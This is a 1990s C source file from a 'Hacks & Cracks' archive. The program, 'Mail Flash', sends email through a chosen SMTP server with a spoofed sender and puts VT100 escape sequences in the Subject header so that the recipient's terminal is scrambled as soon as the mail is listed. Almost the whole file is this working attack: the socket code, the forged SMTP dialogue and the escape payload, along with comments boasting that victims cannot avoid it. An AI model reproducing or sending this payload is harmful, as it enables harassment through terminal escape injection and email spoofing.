home *** CD-ROM | disk | FTP | other *** search
/ Hacks & Cracks / Hacks_and_Cracks.iso / hackersclub / km / downloads / c_scripts / mflash.c < prev    next >
C/C++ Source or Header  |  1998-03-25  |  2KB  |  65 lines

  1. /*
  2.  
  3.   Mail Flash - (C) 1994 CHA0S All Rights Reserved
  4.   
  5.   This is a simple program which demonstrates the problem with certain
  6.   parts of VT100 emulation.  Previously similar programs made use
  7.   of talkd, but a user could stop attempts by simply entering
  8.   "mesg n".  This program sends the "flash" string which will really
  9.   screw over a terminal in the SUBJECT header of e-mail.  E-Mail readers
  10.   such as pine show you this before you can decide to even delete the mail!
  11.   
  12.   Support has been added to choose your own SMTP server for neat-o hostname
  13.   spoofing.  (krad!)
  14.   
  15. */  
  16.  
  17. #include <stdio.h>
  18. #include <sys/param.h>
  19. #include <sys/socket.h>
  20. #include <netinet/in.h>
  21. #include <netdb.h>
  22. #include <stdarg.h>
  23.  
  24. void smtp_connect(char *server);
  25.  
  26. int thesock; /* the socket */
  27.  
  28. void smtp_connect(char *server)
  29. {
  30.   struct sockaddr_in sin;
  31.   struct hostent *hp;
  32.   
  33.   hp = gethostbyname(server);
  34.   if (hp==NULL) {
  35.     printf("Unknown host: %s\n",server);
  36.     exit(0);
  37.   }
  38.   bzero((char*) &sin, sizeof(sin));
  39.   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  40.   sin.sin_family = hp->h_addrtype;
  41.   sin.sin_port = htons(25);
  42.   thesock = socket(AF_INET, SOCK_STREAM, 0);
  43.   connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
  44. }
  45.  
  46. void main(int argc, char **argv)
  47. {
  48.   char buf[1024];
  49.   
  50.   if (argc != 4) {
  51.     printf("usage: mflash smtp_server from to\n");
  52.     exit(0);
  53.   }
  54.   printf("Connecting to SMTP Server %s\n",argv[1]);
  55.   smtp_connect(argv[1]);
  56.   printf("Sending Mail Flash To %s\n",argv[3]);
  57.   sprintf(buf, "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]);
  58.   send(thesock, buf, strlen(buf), 0);
  59.   /* I am not sure how to check when this buffer is done being sent.
  60.      If you are having any problems increase the sleep time below! */
  61.   printf("Sleeping To Make Sure Data Is Sent ...\n");
  62.   sleep(3);
  63.   printf("Done!\n");
  64. }
  65.